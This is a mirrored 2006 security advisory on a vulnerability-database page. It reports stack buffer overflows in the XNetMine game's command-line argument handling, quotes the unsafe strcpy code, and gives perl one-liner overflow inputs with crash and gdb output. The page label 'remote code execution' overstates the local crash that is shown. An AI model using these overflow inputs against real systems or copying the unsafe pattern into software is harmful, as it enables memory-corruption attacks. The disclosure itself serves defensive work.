Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

XNetMine.txt

🗓️ 20 Oct 2006 00:00:00Reported by federicoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

Vulnerable XNetMine software allows for remote code execution through command line inputs, leading to a segmentation fault

Code
`This is a multi-part message in MIME format.  
--------------070909050408080804050008  
Content-Type: text/plain; charset=ISO-8859-1; format=flowed  
Content-Transfer-Encoding: 7bit  
  
//  
  
Vendor: Martin Bauer  
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz  
  
*Vulnerable code:*  
--   
line: 672/676  
  
if (strncmp("-PortNumber",argv[t+1],11)==0)  
{ char text[500];  
strcpy(text,argv[t+1]);  
strcpy(Port,&text[11]);  
}  
--   
line: 677/682  
  
if (strncmp("-Name",argv[t+1],5)==0)  
{  
char text[500];  
strcpy(text,argv[t+1]);  
strcpy(User,&text[5]);  
}  
--   
line: 683/688  
  
if (strncmp("-ServerName",argv[t+1],11)==0)  
{  
char text[500];  
strcpy(text,argv[t+1]);  
strcpy(ServerName,&text[11]);  
}  
--   
  
*Proof of concept:*  
--   
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`  
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)   
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"  
Segmentation fault  
  
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`  
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA  
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""  
Segmentation fault  
  
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`  
Server:1 Client:0 PortNum:31337  
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"  
Segmentation fault  
--   
  
*Debug information:*  
--   
(gdb) p $eip  
$1 = (void (*)()) 0x804a862   
(gdb) stepi  
Program terminated with signal SIGSEGV, Segmentation fault.  
The program no longer exists.  
SIGSEGV 0x0804a862 in main ()  
  
-- federico  
[email protected] / http://defsol.plugs.it/  
  
//  
  
--------------070909050408080804050008  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: 7bit  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
<html>  
<head>  
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">  
<title></title>  
</head>  
<body bgcolor="#ffffff" text="#000000">  
<i><font><i>  
<pre>Vendor: Martin Bauer  
Software: <a class="moz-txt-link-freetext"  
href="http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz">http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz</a>  
  
<b>Vulnerable code:</b>  
--   
line: 672/676  
  
if (strncmp("-PortNumber",argv[t+1],11)==0)  
{ char text[500];  
strcpy(text,argv[t+1]);  
strcpy(Port,&text[11]);  
}  
--   
line: 677/682  
  
if (strncmp("-Name",argv[t+1],5)==0)  
{  
char text[500];  
strcpy(text,argv[t+1]);  
strcpy(User,&text[5]);  
}  
--   
line: 683/688  
  
if (strncmp("-ServerName",argv[t+1],11)==0)  
{  
char text[500];  
strcpy(text,argv[t+1]);  
strcpy(ServerName,&text[11]);  
}  
--   
  
<b>Proof of concept:</b>  
--   
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`  
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)   
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"  
Segmentation fault  
  
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`  
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA  
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""  
Segmentation fault  
  
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`  
Server:1 Client:0 PortNum:31337  
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"  
Segmentation fault  
--   
  
<b>Debug information:</b>  
--   
(gdb) p $eip  
$1 = (void (*)()) 0x804a862 <main+753>  
(gdb) stepi  
Program terminated with signal SIGSEGV, Segmentation fault.  
The program no longer exists.  
SIGSEGV 0x0804a862 in main ()  
  
-- federico  
<a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> / <a  
class="moz-txt-link-freetext" href="http://defsol.plugs.it/">http://defsol.plugs.it/</a>  
</main+753></pre>  
</i></font></i>  
</body>  
</html>  
  
--------------070909050408080804050008--  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4
xnetmineremote code executionsegmentation faultmartin bauercommand line inputs
36